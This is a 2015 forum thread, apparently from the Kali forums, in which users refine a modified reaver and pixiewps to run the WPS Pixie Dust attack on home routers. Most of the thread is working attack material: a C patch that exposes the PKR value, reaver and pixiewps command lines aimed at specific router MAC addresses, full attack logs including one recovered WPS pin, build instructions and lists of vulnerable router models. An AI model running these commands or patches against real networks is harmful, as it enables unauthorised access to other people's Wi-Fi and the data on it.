[?] Restore previous session for 64:70:02:53:D5:FA? [n/Y] n
[+] Waiting for beacon from 64:70:02:53:D5:FA
[+] Associated with 64:70:02:53:D5:FA (ESSID: t6)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
[P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91 :6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:f f:24:f7:........
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3 :88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:1 8:45:.......
[+] Sending M2 message
[P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
[P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK


Hi t6_x, would it be possible for you to post this version of reaver?

soxrok2212
2015-04-12, 01:54
I'll upload the new reaver tomorrow when I get a chance :)

soxrok2212
2015-04-12, 01:54
Is this helpful?


diff --git a/src/crypto/dh_groups.c b/src/crypto/dh_groups.c
--- a/src/crypto/dh_groups.c
+++ b/src/crypto/dh_groups.c
@@ -605,6 +605,17 @@ struct wpabuf * dh_init(const struct dh_
wpabuf_put(pv, pv_len);
wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);

+ printf("[P] PKR: ");
+ int pixiecnt = 0;
+ const u8 *pkr = wpabuf_head_u8(pv);
+ for (; pixiecnt < 192; pixiecnt++) {
+ printf("%02x", pkr[pixiecnt]);
+ if (pixiecnt != 191) {
+ printf(":");
+ }
+ }
+ printf("\n");
+
return pv;
}

Yeah that's what we've been looking for! Thanks!

psicomantis
2015-04-12, 01:59
I'll upload the new reaver tomorrow when I get a chance :)

Thank you very much soxrok2212.

nuroo
2015-04-12, 03:12
New reaver and pixiewps, good times :D

mmusket33
2015-04-12, 03:48
For the modded reaver for pixiedust

You can separate out the pixiedust data and write directly to a file as follows:

If you include the -o <filename> command in the reaver command line:

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01

reaver will write to file all data not preceeded with [P] to pixietest01

reaver will write data proceeded with [P] to screen not to file


The data proceeded by [P] though is the data required for a pixiedust attack.

Therefore:

To write only pixiedust data to a file use the following:

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01 | tee pixiedust02

In this case:

Non pixiedust data will be written to pixiedust01

Pixiedust data only will be written to both screen and the file pixiedust02


Musket Teams

mmusket33
2015-04-12, 10:55
To soxrox2212

MTeams modded the /src/crypto/dh_groups.c file as suggested by Espresso above .

We reinstalled reaver and ran tests.

The --pkr variable is the provided thru reaver along with the --pke etc

The mod is inserted below line 606

Line 606 = wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);


wpabuf_put(pv, pv_len);
wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);

/******** ADD THIS PART ******/

printf("[P] PKR: ");
int pixiecnt = 0;
const u8 *pkr = wpabuf_head_u8(pv);
for (; pixiecnt < 192; pixiecnt++) {
printf("%02x", pkr[pixiecnt]);
if (pixiecnt != 191) {
printf(":");
}
}
printf("\n");

/*** END ADD THIS PART END ***/

return pv;
}



We will send you an automated script soon. We are currently using it, but the addition of a --pkr variable provided by reaver has caused us to have to add this choice into the menu so there will be a delay.

MTeams

nuroo
2015-04-12, 14:29
@MTeams

Your internal reaver mod version feeds info into pixiewps automatically? (no more cut and paste?)

If pixie attack works > key........if fail bruteforce 11,000 pins?

Will release when -pkr added?

t6_x
2015-04-12, 14:46
https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack

nuroo
2015-04-12, 15:23
Here is my contribution

Reaver modified to make the pixiewps when testing a pin


GitHub - Here (https://github.com/t6x/reaver-wps-fork-t6x)

https://github.com/t6x/reaver-wps-fork-t6x



Thanks t6, just tested it.


reaver -i mon0 -b 40:70:09:DC:81:F0 -vv -S -K1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>

[+] Waiting for beacon from 40:**:**:**:BA:60
[+] Switching mon0 to channel 1
[+] Associated with 40:**:**:**:BA:60 (ESSID: TG1672G62)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: f2:f4:15:6c:59:39:dc:06:18:e9:c9:4f:e0:f3:8a:ad
[P] PKE: dc:1e:5a:f6:6c:b8:98:9f:de:77:66:4e:41:fb:e7:11:b7 :02:b7:7c:59:52:11:81:19:32:f0:f7:51:4e:27:8e:57:9 a:de:10:f7:b8:5b:1e:fd:aa:6e:06:9e:e1:f1:96:e5:5a: c7:6f:e8:41:f5:ae:4b:11:53:65:59:6f:48:11:07:4c:93 :80:c3:bb:ee:9a:e8:af:50:f6:58:fd:97:52:37:30:e9:5 b:8a:74:41:54:17:da:7e:ea:5a:8a:9e:bc:f7:40:7e:8d: 65:29:f2:6b:21:ee:27:ae:c3:60:42:db:2c:75:2d:72:5e :33:79:7c:3a:5e:55:90:69:a9:2b:92:4d:2f:9a:14:13:1 c:f0:f8:92:c6:77:04:eb:03:9c:e6:1f:7b:ea:8b:2b:5e: 18:9f:99:49:38:e3:9a:4b:60:09:41:94:83:51:47:1d:b7 :d5:1b:4c:51:7a:92:be:77:da:b5:eb:a3:86:7a:dc:84:b 9:99:fe:02:2c:5c:44:36:a3
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: c3:ee:01:ef:f3:63:86:49:7e:24:13:54:d1:f0:0d:ff:57 :77:12:65:38:34:6f:10:4a:c8:14:95:57:6c:0e:2f
[+] Sending M2 message
[P] E-Hash1: 41:73:b9:eb:ea:74:0f:b1:fd:1a:d1:93:0f:df:37:8e:d7 :fe:6c:ee:c2:ec:0f:0d:60:ac:91:4d:04:60:03:ee
[P] E-Hash2: f7:42:2b:e7:13:6f:d0:00:d8:05:72:7d:b6:71:29:c4:10 :1f:2f:01:0b:38:b2:9e:7d:99:3f:a7:86:d5:93:85
[Pixie-Dust]
[Pixie-Dust]
ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]
ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]
PSK1: d5:84:7c:94:bb:1c:3e:45:a5:3f:60:b4:a1:2b:a4:9b
[Pixie-Dust]
PSK2: 45:68:18:4b:9b:28:45:c9:2a:c8:78:c3:b8:a9:b6:92
[Pixie-Dust] [+] WPS pin: 60919014
[Pixie-Dust]
[Pixie-Dust]
Time taken: 0 s
[Pixie-Dust]
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response


+1 for adding pkr to reaver output :o
Awesome!!

nuroo
2015-04-12, 15:42
In example above reaver/pixie found pin. Nice.
But it kept going. Continuing to try pins.

Shouldnt it check the found pixie pin, to get the passphrase and then end?

soxrok2212
2015-04-12, 15:45
Thanks to Wiire and Espresso_Boy, the new modified reaver now prints the PKr for Realtek devices! http://www.mediafire.com/download/or4jj8m8jfek5b4

t6_x
2015-04-12, 15:59
In example above reaver/pixie found pin. Nice.
But it kept going. Continuing to try pins.

Shouldnt it check the found pixie pin, to get the passphrase and then end?

Yes, it is possible

I'll make adjustments, for he did not continue with the test after running the pixie

I will add an option to get the passphrase and close.

Thanks for the tests and the contribution.

Soon I commit

bigfoot
2015-04-12, 16:04
root@kali:~# reaver -i mon0 -b 00:8E:F2:65:C4:74 -vv

Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for 00:8E:F2:65:C4:74? [n/Y] n
[+] Waiting for beacon from 00:8E:F2:65:C4:74
[+] Switching mon0 to channel 12
[+] Associated with 00:8E:F2:65:C4:74 (ESSID: virginmedia6972489)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 85:a2:64:d7:01:eb:1c:3f:9e:57:18:1e:8c:8d:cd:ec
[P] PKE: 65:af:14:9c:e5:9b:2a:46:5f:a3:c4:e8:8e:ff:70:c4:35 :10:ab:8f:a0:ef:a5:53:d8:14:ee:87:e7:ea:20:b4:27:f 5:9d:b3:77:0f:c0:0b:3d:82:d7:c6:2d:65:84:62:bb:de: dc:9a:9e:f5:a2:6a:8d:94:f4:d2:28:6c:64:80:9c:b3:06 :fe:b5:4f:a0:8b:8d:12:54:97:16:0c:98:87:b4:52:0f:b 4:53:39:b8:72:f8:08:cd:9f:1e:4e:b9:d4:c5:7b:77:69: 84:17:e8:72:81:9c:b0:a7:af:86:92:6c:2f:38:03:7e:d9 :2a:16:31:51:b3:22:22:ed:6b:4c:76:f7:cf:a5:4e:68:9 7:5c:fc:16:2a:a7:13:0e:0d:c2:93:31:3f:08:a3:51:cb: 5c:68:b4:08:b5:90:89:c7:3c:a8:ef:20:dc:4d:b5:54:dc :03:d0:a2:80:ad:35:57:7a:e4:50:1c:a8:6a:eb:f2:d9:8 8:a0:7c:b3:a7:a8:8f:c7:26
[P] WPS Manufacturer: Netgear
[P] WPS Model Number: 123456
[+] Received M1 message
[P] PKR: b8:d9:19:ba:d9:af:20:61:11:4c:7b:6b:03:97:ce:fc:59 :bd:c5:f0:e0:d9:c8:ab:13:10:8e:ef:11:ff:b9:91:2a:6 a:7e:d9:61:6b:61:04:5b:56:ed:8e:d3:38:3a:94:bf:57: 5c:1b:2c:d0:1a:39:ec:53:26:43:62:8d:fc:62:bb:64:0b :b6:ed:4d:96:8d:8d:67:b9:a2:68:21:a5:de:6d:e1:65:2 d:7b:bd:25:95:26:f0:2d:ef:2d:9b:30:57:59:e0:5f:b9: b8:92:7a:03:16:84:3a:c0:cd:ee:56:d9:6f:ba:48:65:7d :9b:cf:72:d0:24:1a:96:c5:db:29:67:cc:4c:d2:58:0c:f 5:75:5c:04:d8:a0:25:05:5e:7a:c9:e9:0f:aa:7f:fc:cf: 42:58:d7:d0:5b:ba:d0:84:c1:f4:62:53:af:02:57:54:8c :f4:7f:26:4b:ca:b2:01:a9:16:f5:7b:38:53:76:c8:a9:9 a:04:6f:be:05:40:87:ac:3e
[P] AuthKey: de:7d:cd:3d:d7:1c:90:ef:7c:bb:f8:01:90:6e:14:08:4a :77:4b:33:88:7b:41:05:85:a7:46:74:14:72:00:ae
[+] Sending M2 message
[P] E-Hash1: db:b9:20:c2:cf:a1:53:55:f2:d0:1a:79:ce:4c:f5:ba:7c :4f:dd:4d:f4:b3:35:ef:86:a3:93:47:00:c1:05:0b
[P] E-Hash2: 97:f5:e9:a1:4e:cd:bf:8f:76:dd:8c:87:1a:30:24:76:8e :0c:56:c1:11:4e:77:89:33:45:c9:f6:66:b9:05:dc


Working well now to see if it will find the pin, other attempts before said no.

bigfoot
2015-04-12, 16:12
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 7C:4C:A5:D3:84:45
[+] Associated with 7C:4C:A5:D3:84:45 (ESSID: SKYA2FF7)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 04:57:06:96:9a:79:ba:40:c4:98:bb:bd:8f:44:82:84
[P] PKE: 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6 :3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2 f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9: 40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3 :25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:8 5:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29: 81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75 :51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:9 8:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18: b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b :f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:8 8:03:a5:a7:a1:0f:a9:6f:37
[P] WPS Manufacturer: Broadcom
[P] WPS Model Number: 123456
[+] Received M1 message
[P] PKR: f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9 :e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:4 8:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e: ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46 :d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:7 2:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e: b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d :85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d 0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d: bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be :c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9 e:59:92:16:a4:06:d1:c0:cb
[P] AuthKey: 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa :ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef
[+] Sending M2 message
[P] E-Hash1: 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32 :c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f
[P] E-Hash2: b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81 :d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a


root@kali:~# pixiewps -e 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6 :3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2 f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9: 40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3 :25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:8 5:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29: 81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75 :51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:9 8:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18: b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b :f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:8 8:03:a5:a7:a1:0f:a9:6f:37 -r f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9 :e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:4 8:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e: ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46 :d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:7 2:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e: b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d :85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d 0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d: bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be :c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9 e:59:92:16:a4:06:d1:c0:cb -s 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32 :c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f -z b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81 :d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a -a 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa :ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef

[-] WPS pin not found!

Time taken: 0 s

nuroo
2015-04-12, 17:31
@soxrok2212 (https://forums.kali.org/member.php?17496-soxrok2212)

Reaver reports:
Manufacturer: MTT
Model Number: 123456

Wireshark reports:
Manufacturer: MTT
Model Name: MWG3401N

Brand name possibly Zoom? Cant find any info on chipset used



Pixiewps attack fails, however 1st try pin '12345670' gives passphrare!! Wow

soxrok2212
2015-04-12, 17:58
Probably a really old AP that the manufacturer never fixed.

someone_else
2015-04-12, 18:22
Vulnerable:

WPS Manufacturer: D-Link
WPS Model Number: DIR-615H1
CHiP: Ralink RT3352
E-Nonce: 60:d5:32:46:7f:2c:31:a8:e6:0b:db:5a:5e:06:ce:f8
PKE:ac:21:5b:eb:8d:70:ac:53:81:c7:4d:aa:fc:88:90:3 d:8f:c7:5d:e8:fa:b1:d3:0f:d6:81:bf:d7:a1:0d:23:62: d3:07:77:d6:76:7b:5c:cc:18:f2:13:f3:1f:d2:64:86:87 :67:74:cf:38:db:e4:32:86:92:65:05:9a:8d:a3:eb:79:2 7:60:e6:13:74:d2:3b:92:42:37:e3:bb:3d:29:db:ff:78: 49:27:18:10:ef:bd:a4:ce:57:40:aa:7e:2d:bf:21:51:9f :91:f0:df:e3:d2:89:b5:9f:c1:b6:1c:5c:1e:d9:e3:73:d 4:38:3b:75:2e:e1:c2:63:55:a3:4d:e9:fe:c3:1f:e4:4d: ac:69:fe:9c:d3:37:7a:df:36:89:a3:61:00:92:d2:94:2e :b2:fd:82:84:b8:08:d3:64:ea:28:cd:26:5e:d6:62:a0:8 e:e5:df:f6:5f:2c:0d:28:c8:b6:48:c7:91:d2:e5:b7:d6: bd:c1:f4:7a:e6:be:e1:37:0b:96
AuthKey: 93:94:ad:9a:fd:e1:e4:bc:6e:9b:77:ec:a8:52:de:cb:33 :3f:11:6d:d8:66:b2:d3:01:25:27:b9:9c:1f:91:ed
E-Hash1: 86:31:65:59:bc:4c:4f:6c:55:53:6c:bd:24:82:11:4c:35 :4b:16:ed:b4:f9:b5:d5:b7:6a:d0:7f:be:bd:68:b8
E-Hash2: 4b:f6:32:c3:55:2e:0b:e4:41:68:7b:03:10:74:2b:59:44 :6a:ee:27:d2:93:ca:d0:1a:cb:a1:da:2a:95:c6:9d

NOT VULNERABLE:

Modell: WNR1000v3 - Netgear
Chip:Broadcom BCM5356A1

E-Nonce: 5a:bc:44:d6:c7:96:9f:12:4e:e2:0a:c3:b6:b2:cd:53
PKE:e5:4d:f8:60:b2:0c:a4:1e:94:55:46:bf:b5:e6:ba:7 2:0b:52:b5:37:ef:d9:e3:cd:a9:cd:e6:16:c6:b6:d9:d4: 41:47:05:59:aa:3c:b9:e0:2d:89:4b:d1:bd:97:a1:23:a4 :b7:98:48:2b:6e:dd:a1:b2:0c:28:d1:2c:a5:1c:6a:c7:2 6:e2:4d:18:f0:28:2d:1b:35:85:a0:01:1d:2f:1c:09:f6: b0:03:ee:c6:86:ff:dd:8d:84:f1:22:1d:de:2a:ff:9e:b3 :70:95:09:75:85:4a:1a:8a:41:57:7b:8e:e2:60:79:4f:9 1:cc:a2:55:12:73:a5:6c:e3:c5:08:fc:81:9a:1f:18:48: 25:69:f6:d6:6e:d2:1b:c3:d2:7b:87:c1:ee:ab:e6:e3:48 :eb:ed:8c:4f:1a:d1:60:27:b7:88:ed:96:5c:47:5f:b5:a 4:d3:78:0b:20:f7:5b:1e:cf:c0:a0:03:e4:49:f1:57:df: f9:b9:42:85:a0:51:dd:bc:cf:bd
PKR:d8:8d:2f:fe:ca:6a:e6:db:c8:ac:7d:9c:5c:f8:36:6 b:7c:40:d2:56:91:0c:5d:d8:e4:f1:a8:2b:7f:c1:10:98: bf:a2:e3:df:02:a3:86:bb:be:10:a7:00:62:43:41:74:db :15:40:b5:18:42:de:92:e3:15:02:40:63:f2:fa:43:3d:e d:8c:78:e5:bf:40:37:1f:72:78:3a:73:c8:1f:93:9c:13: 18:a4:22:a6:8f:66:7d:c2:43:12:94:6f:92:a4:42:19:b2 :0d:21:b4:23:7b:75:75:f2:99:13:d4:09:76:fb:a7:23:9 3:1b:82:93:91:f6:cf:92:af:15:36:3c:a5:c4:5e:65:95: 10:52:54:dc:74:7b:b9:74:2d:fa:9e:6f:fb:c9:e6:87:a7 :ee:47:31:dc:ae:93:ba:6d:15:13:c9:51:7f:de:8f:f7:c 7:c3:09:86:3d:6b:cd:5e:3a:7d:a7:af:fb:39:82:10:12: 0c:1c:23:f7:16:6b:fe:6c:86:fc
AuthKey: 5a:bf:8b:43:be:0d:e2:12:0d:48:a5:a4:95:7a:e5:31:1d :6a:75:0e:49:7e:6e:fd:18:07:96:c3:7d:21:f8:1e
E-Hash1: 2a:1f:0d:4e:de:29:61:01:a0:86:45:be:34:71:ae:15:3c :58:21:e1:34:77:9b:f7:89:ed:48:07:b8:ee:9e:ac
E-Hash2: 44:31:63:0f:9c:5e:e7:5b:bb:a7:1b:c2:b7:14:35:93:16 :fe:e7:0e:0e:33:85:c3:08:9f:24:a6:8c:dd:68:c7

btw @soxrok2212: i forgot two digits in the hitron-no. correct is cve30360, not cve360]
@all:
is there any way, to calculate the auth-key from an existing .pcap with some bash/shell-code ? i like to extract the necessary info with tshark from capture-file (for PKR : tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the auth-key with some bash-script.
thanks & i forgot at my first post : great work ! :cool:

t6_x
2015-04-13, 04:14
In example above reaver/pixie found pin. Nice.
But it kept going. Continuing to try pins.

Shouldnt it check the found pixie pin, to get the passphrase and then end?

I gave commit in a new version on github, but I could not get into the forum to post

Whenever you need to make modifications and further improvements just stay tuned on github.

This week I will post a new tool





Apparently someone was attacking this my account to stop me from logging in this forum, I do not know what the reason for this, I tried to create another account, but also began to be attacked also

I told the admin and they are already looking for the User responsible for this (Someone behind this proxy (167.114.0.xxx) )

nuroo
2015-04-13, 10:35
I gave commit in a new version on github, but I could not get into the forum to post

Whenever you need to make modifications and further improvements just stay tuned on github.

This week I will post a new tool





Apparently someone was attacking this my account to stop me from logging in this forum, I do not know what the reason for this, I tried to create another account, but also began to be attacked also

I told the admin and they are already looking for the User responsible for this (Someone behind this proxy (167.114.0.xxx) )

wow t6, someone is a hater. Sry to hear you where being blocked. Wish I saw this post last night, I'm anxious to try new version reaver, but time for work. I will try it lunch time and report but. Excellent work !

soxrok2212
2015-04-13, 12:59
[B]@all:
is there any way, to calculate the auth-key from an existing .pcap with some bash/shell-code ? i like to extract the necessary info with tshark from capture-file (for PKR : tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the auth-key with some bash-script.
thanks & i forgot at my first post : great work ! :cool:

Yeah its pretty simple but we haven't done it yet :P The drawback is you need to use small DH Keys in reaver to do it manually... and small DH keys don't work for Realtek:P Anyways, all you have to do is make the KDK, or Key Derivation Key:


KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)


And then this gives you the AuthKey, KeyWrapKey and the EMSK:


kdf(key, personalization_string, total_key_bits) : result := “”
iterations = (total_key_bits + prf_digest_size – 1)/prf_digest_size for i = 1 to iterations do
result := result || prf(key, i || personalization_string || total_key_bits) return 1st total_key_bits of result and destroy any bits left over


I'm not a coder so I can't do it but I'm sure someone else can.

nuroo
2015-04-14, 08:19
Belkin International
F9K1002

wikidevi (https://wikidevi.com/wiki/Belkin_F9K1002_v5) 5 versions, different chipsets.

pixiewps attack failed though, didnt catch version number with wireshack however

simo1
2015-04-14, 10:45
Hi. thanks for this great information. Keep it up :-) . I tried to do it with pixiewps master but I didn't find the prk key and I added the -S but it didn't work. so, I tried the Pixiescript v2.1 and I got this : thanks :D

REAVER TRABAJANDO CON BSSID 18:17:25:2B:E3:50, ESSID TNCAP2BE350 ESPERA 50 s ...
EXTRAYENDO DATOS ...
PKr : 00814f6ea4c9ab9d5d80106f6b8e314768ae728b4214c4698a 02eb9320f41e53f1054e6e137f64b64fec379fed2ce57c04af 39e51ff450908c74df7e6d7df0ec1430dca9841ec83b2e318c 78d8835a8b03c6321af1a168cd2a6383fa6458cce341a45e85 fbad444291e255d1c3204c12df3c8373061b6183f55c8ff458 f68f433334c1c0424fd95756efff233d8087a1d92aa64e92bb 3470ac1625c5308dc1af5839e58a42f35336e3f74a4b18806c f6cc6f054a9700fee1d8a507ce413dc07a
PKe : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b
EHASH1 : 316321fbd0c01cd758a89284fdc4c40bcbbe8f4be95a9d8f2b 22c6504a8d4e70
EHASH2 : c680832b3a6e8afc47ef64147757cfb5d66ad977ea4cfc1dd6 d004563e1f2629
AuthKey: 89299deee5f7a96ff56751a1628d9b9fdcad677af68ceb015d 5249bd7aac13ad
Enrollee Nonce: 6e6e281312d0aa2679a8909435fd7d6f

DATOS AP
========
BSSID: : 18:17:25:2B:E3:50
ESSID: : TNCAP2BE350
Fabricante : Technicolor
Nombre del dispositivo : Router
Version OS : 268435456
Modelo : Technicolor TD5
Numero de modelo : Technicolor TD5

PROBANDO CON PIXIEWPS 1.0 by wiire

[-] WPS pin not found!

Time taken: 1 s

SubZero5
2015-04-14, 15:34
I tried the Pixiescript v2.1 and ...Pixiescript v2.4 is out.

DeEqualsDos
2015-04-14, 18:24
If you have the wps pin already through another method
how can you find out the pass-phrase ?

saturn95
2015-04-15, 01:32
Really interested but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
It needs reaver and what must I do to install?
Thank you

nuroo
2015-04-15, 14:31
Really interested but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
It needs reaver and what must I do to install?
Thank you

Build Reaver

cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install <<<----- will remove old version

saturn95
2015-04-15, 16:23
Build Reaver

cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install <<<----- will remove old version

Thank you for responding

I am now trying to figure how to use Wireshark to find M1 and M2 data.

Thank you

Saydamination
2015-04-15, 20:01
Great! :)

Vulnerable ralink chipsets ...
İnvulnerable realtek chipsets.

Example... RTL8671 EV 2006-27-07 realtek chipsets are invulnerable...


some modems using modem serial number for wps pin..

Example . Air -rities modems...

aanarchyy
2015-04-15, 21:42
Use the wireshark filter "eapol.type == 0" and they are much easier to find.

nuroo
2015-04-15, 22:41
Use the wireshark filter "eapol.type == 0" and they are much easier to find.

Is that a display filter correct?
Is there a similar capture filter so file size not so big?

nuroo
2015-04-15, 23:12
Googled my own question.
Display filter for Ethernet type EAPOL.
"eapol.type == 0" or just "eapol"

Capture filter for Ethernet type EAPOL - only saves eapols to hard drive during a capture session, much smaller file size.
"ether proto 0x888e"

enter without quotes.

unsuns06
2015-04-17, 17:51
Hello Everyone !

I want first to congratulate you about the great steps you did through this Pixie Dust Exploit.

Also, I have noticed that today, on the WPS Pixie Dust Database (https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923) , the router Technicolor TD5130 is being said as Vulnerable.

